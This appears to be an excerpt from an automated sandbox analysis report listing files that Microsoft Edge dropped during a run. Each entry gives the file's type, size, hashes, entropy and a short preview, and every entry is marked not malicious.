                                                                                                                                                                                                                                                                                                                    SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):428
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.227782117668603
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:fG1VVvLZYebvqBZFUt88GkG1/+87VI54ZYebvqBaJ:fsnlYebvyg88iZ7IoYebvL
                                                                                                                                                                                                                                                                                                                    MD5:2015FB0449A91912B906B01540558024
                                                                                                                                                                                                                                                                                                                    SHA1:1121F6B59FF726D5A6F18744E0E315B717A2D7B8
                                                                                                                                                                                                                                                                                                                    SHA-256:1C9CD1A8221E28F3BF854AC00300768C57A0298B43C83260DA0C468BB14E906A
                                                                                                                                                                                                                                                                                                                    SHA-512:C89E84E664BC9E13DFD6296EA50CAB276D30FA42C53545F0330977C241961EED8DDEFBB6B3C3BABF4DA85303EBCEEE9ED224AA56F6F41041DADE1382D1B4A3D3
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:31.315 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/27-04:49:31.316 1f30 Recovering log #3.2024/11/27-04:49:31.321 1f30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):428
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.227782117668603
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:fG1VVvLZYebvqBZFUt88GkG1/+87VI54ZYebvqBaJ:fsnlYebvyg88iZ7IoYebvL
                                                                                                                                                                                                                                                                                                                    MD5:2015FB0449A91912B906B01540558024
                                                                                                                                                                                                                                                                                                                    SHA1:1121F6B59FF726D5A6F18744E0E315B717A2D7B8
                                                                                                                                                                                                                                                                                                                    SHA-256:1C9CD1A8221E28F3BF854AC00300768C57A0298B43C83260DA0C468BB14E906A
                                                                                                                                                                                                                                                                                                                    SHA-512:C89E84E664BC9E13DFD6296EA50CAB276D30FA42C53545F0330977C241961EED8DDEFBB6B3C3BABF4DA85303EBCEEE9ED224AA56F6F41041DADE1382D1B4A3D3
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:31.315 1f30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/27-04:49:31.316 1f30 Recovering log #3.2024/11/27-04:49:31.321 1f30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):334
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2346129658348834
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe02U+q2PcNwi23oH+TcwtpIFUt8YCe020Zmw+YCe0EfVkwOcNwi23oH+TcwtaQ:fRvLZYebmFUt88M/+8F54ZYebaUJ
                                                                                                                                                                                                                                                                                                                    MD5:2533EB88D7229727194A3C6A1382219D
                                                                                                                                                                                                                                                                                                                    SHA1:1C45367A3F76F8E116C1F53C3C556ED5C970ECA8
                                                                                                                                                                                                                                                                                                                    SHA-256:73D126D8C3AEEA64652D58F5CA91CBBB69C3CC93695EFAE5660846A9A22D5ADF
                                                                                                                                                                                                                                                                                                                    SHA-512:21100A992502715AF8377D10778B6A30FB096B02605A0206F7135E90ABF3B28DC117948F7D043378BDDC264B963FCCC1C50828C54F3AF495293A6AA1387B68FB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.272 1be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/27-04:49:12.272 1be8 Recovering log #3.2024/11/27-04:49:12.273 1be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):334
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2346129658348834
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe02U+q2PcNwi23oH+TcwtpIFUt8YCe020Zmw+YCe0EfVkwOcNwi23oH+TcwtaQ:fRvLZYebmFUt88M/+8F54ZYebaUJ
                                                                                                                                                                                                                                                                                                                    MD5:2533EB88D7229727194A3C6A1382219D
                                                                                                                                                                                                                                                                                                                    SHA1:1C45367A3F76F8E116C1F53C3C556ED5C970ECA8
                                                                                                                                                                                                                                                                                                                    SHA-256:73D126D8C3AEEA64652D58F5CA91CBBB69C3CC93695EFAE5660846A9A22D5ADF
                                                                                                                                                                                                                                                                                                                    SHA-512:21100A992502715AF8377D10778B6A30FB096B02605A0206F7135E90ABF3B28DC117948F7D043378BDDC264B963FCCC1C50828C54F3AF495293A6AA1387B68FB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.272 1be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/27-04:49:12.272 1be8 Recovering log #3.2024/11/27-04:49:12.273 1be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.265233241979909
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:384:KrJ/2qOB1nxCkM9SAELyKOMq+8HKkjucswRv8p3nVumc:K0q+n0J99ELyKOMq+8HKkjuczRv89Y
                                                                                                                                                                                                                                                                                                                    MD5:5BA7DA21D955637A5B1C9A7E50A42F9F
                                                                                                                                                                                                                                                                                                                    SHA1:FB21B99AB84FE55398883D3EBBCA5C90322DA7E5
                                                                                                                                                                                                                                                                                                                    SHA-256:89C5CA892666E88FBD3C25606843ABB52EB93EAC190FF4B2F65E44212870DDC2
                                                                                                                                                                                                                                                                                                                    SHA-512:779CA10A9852F2AFA338FFA31939ABFCBC1BD7C1FEF7D40FE04FD231C1FB5FDB3F963140A3F0C1F23E1B8D09965BCFB7E651B1C39C97C7DF0B9C3D2CC443A9B0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.46657141250061096
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0+0XW5GY:v7doKsKuKZKlZNmu46yjx0+dD
                                                                                                                                                                                                                                                                                                                    MD5:A0EAE40A47B22BE4E4E6E70E8B4A68B2
                                                                                                                                                                                                                                                                                                                    SHA1:6AFA9796CF45A8DBA22C78700EA51666631A1153
                                                                                                                                                                                                                                                                                                                    SHA-256:CE2FAB86064DB2561F702BA62A0B2A1F95DCB0C242DDF36C0EC445378AF3FA46
                                                                                                                                                                                                                                                                                                                    SHA-512:A57232FFFEDF2152311E82A8EF52A63711233CDD1581AFC67DA497C06E86EAEF791CD8EC178454D1657280CA499121F1B7D2E99930A6C156053407C7304B7D95
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):11755
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                    MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                    SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                    SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                    SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):40504
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.561157812604882
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:5Vccmf7pLGLPE6WP4Sfqa8F1+UoAYDCx9Tuqh0VfUC9xbog/OV5zKZxU3rwB/pI6:5VccmZcPE6WP4Sfqau1ja0zKzUkB/KvS
                                                                                                                                                                                                                                                                                                                    MD5:B2E0D3F31DD97EDC6BE94FFBF0A0F2EB
                                                                                                                                                                                                                                                                                                                    SHA1:659C030DFCF84EB8E723B78FB68ECD6CA3A80F30
                                                                                                                                                                                                                                                                                                                    SHA-256:66E9A4943E2A33E5A9C22AF7E033C40A1727FB32E5331776D11E44E40B5405D6
                                                                                                                                                                                                                                                                                                                    SHA-512:9DD4855D8FE836418DEAAD40C39A28BAB8065F55EB39DBECCCC46D2CCF2DEBE56CC9FE66B3A8DC2B46BBF470BB63C19F871F7774E5398B262B3C5E600D0E2EF7
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377174552143414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377174552143414","location":5,"ma
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                    MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                    SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                    SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                    SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (17331), with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):17339
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.499910597571947
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:384:st8PGQSu4YstYtJw8BANnQCnz6p8UrbGxQwZV:syOXueYQnMbGiu
                                                                                                                                                                                                                                                                                                                    MD5:92D79079BC83B2B61633D129EE9C2CF3
                                                                                                                                                                                                                                                                                                                    SHA1:2B213CD4046FCE2587E59176A91F31F2F79B3D1F
                                                                                                                                                                                                                                                                                                                    SHA-256:B1847ABE74F2DA99BDE63B199F46EB772591E76DE030E641E7B96658103A5B31
                                                                                                                                                                                                                                                                                                                    SHA-512:E1FF2E91A898400A7836787E013C6492E3C5215CA3389D181D6B40FE09BDF46315BC3CAC014BE3317E8346392CCB2FEB4421F38E01E4FCF1CFBDAF8A21825747
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377174552765759","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (17331), with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):17339
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5001414796215204
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:384:st8PGQSu4YstYtJw8BANnQCnz6p8UrbGxQwqV:syOXueYQnMbGiR
                                                                                                                                                                                                                                                                                                                    MD5:6E677418AAC362D419DDA8603DB13CC3
                                                                                                                                                                                                                                                                                                                    SHA1:D605F31EB23354D3C92B71694977372BF6111CB6
                                                                                                                                                                                                                                                                                                                    SHA-256:4A7356548996D375E7AD9977D9413D53A14DDD38777AD0853B943C3C88ADD818
                                                                                                                                                                                                                                                                                                                    SHA-512:32DD19B312EAA2808B88835F10A036A85520738CB68F8CC95F33A8D08DAAF65E3A5264F9D8FBCE784B22EB8A39E0580B4E504B16204047D22865DF3258AF307D
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377174552765759","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.10269545933866954
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:+UbmUb7spEjVl/PnnnnnnnnnnnvoQ/Eou:+xboPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                                    MD5:22153C1A33CABFDE59D244D74E526F64
                                                                                                                                                                                                                                                                                                                    SHA1:702595578F260F7F0C58E2A3BEF0E3B867B7C4CA
                                                                                                                                                                                                                                                                                                                    SHA-256:2C1514E8D03A0A6349D2F31A4DE62FC62FCA85DB0A854E432BF1ADE940418031
                                                                                                                                                                                                                                                                                                                    SHA-512:D97437259BFEDB27EA8E22E62892AAEEF06C0B2F0BBF39BAE9AFD5B57B6CDC38ED83C197E3397CD68A85191A9ED923AC6DA512DC701C2F61A61ECF2645E764C4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:..-.............M.......p.{.....3.-.....f.........-.............M.......p.{.....3.-.....f...............I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):317272
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.88896357847761
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:384:mgJJvnWMF3zaA9YKhT/BxtBUk8w1p4v8fwyLyUEyIyqzuyixyPH:ZOGO
                                                                                                                                                                                                                                                                                                                    MD5:96E5376753AF8083651EC59800CA3F5E
                                                                                                                                                                                                                                                                                                                    SHA1:9C03979D2635462BC16640BAD0ADA349E82E3B85
                                                                                                                                                                                                                                                                                                                    SHA-256:3CF300A6ACFF2F945A94BD2C226233A2A0F2648DE1617BD87EA6EDD618FF71D1
                                                                                                                                                                                                                                                                                                                    SHA-512:3B642AB8ADDF25808C10C8AE22B30556B621EE977EAA7659355F66DA74DEED7C9E79655F8B8E3A8F64020CD404CB426C92139B8BEC94F6D3B046AAB377D4E261
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):419
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6897135534042964
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuujDVOPsedhOsV:llc8BOuuuuuuuuuuuujDVD8f
                                                                                                                                                                                                                                                                                                                    MD5:CE65C6219BE683CF84F65E2CC9195714
                                                                                                                                                                                                                                                                                                                    SHA1:305D66B0BCDD4F69594D09E7E8FCFD9F6982A104
                                                                                                                                                                                                                                                                                                                    SHA-256:D5B04FFEC07159B500A7EFC4F6931AD9209DC23E1EF00D97F7817937465E4752
                                                                                                                                                                                                                                                                                                                    SHA-512:E110EB5B38F63A13432EAB8583F9EAA7BCCC9365D71744D7C9B01CD755ADE9088842E11A074376DDD601FEEC3216F8E13ADC8390866278B4DDC2BE9D183FE67D
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...................0................39_config..........6.....n ....1
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.224932352364163
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0v3+q2PcNwi23oH+TcwtfrK+IFUt8YCe0sZmw+YCe0sVkwOcNwi23oH+Tcwt5:fzvLZYeb23FUt88B/+8b54ZYeb3J
                                                                                                                                                                                                                                                                                                                    MD5:AA302A0740E8BD9BA3950C754AFADACC
                                                                                                                                                                                                                                                                                                                    SHA1:ABD3066E828CB8B3258BA37B8518899706DF8EC2
                                                                                                                                                                                                                                                                                                                    SHA-256:8EE7524A87931F804BA0E455999D02326676096904EEFA6B5E22F21CE7CAF84A
                                                                                                                                                                                                                                                                                                                    SHA-512:4E90EEFAAE48A3802369524854931D6B137D5483013023C35112AF5F573F06CABC610B585778F3367A983AA486325144FF4E365FCE6BF8D0302DD215721BD084
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.828 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/27-04:49:12.829 1f08 Recovering log #3.2024/11/27-04:49:12.829 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.224932352364163
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0v3+q2PcNwi23oH+TcwtfrK+IFUt8YCe0sZmw+YCe0sVkwOcNwi23oH+Tcwt5:fzvLZYeb23FUt88B/+8b54ZYeb3J
                                                                                                                                                                                                                                                                                                                    MD5:AA302A0740E8BD9BA3950C754AFADACC
                                                                                                                                                                                                                                                                                                                    SHA1:ABD3066E828CB8B3258BA37B8518899706DF8EC2
                                                                                                                                                                                                                                                                                                                    SHA-256:8EE7524A87931F804BA0E455999D02326676096904EEFA6B5E22F21CE7CAF84A
                                                                                                                                                                                                                                                                                                                    SHA-512:4E90EEFAAE48A3802369524854931D6B137D5483013023C35112AF5F573F06CABC610B585778F3367A983AA486325144FF4E365FCE6BF8D0302DD215721BD084
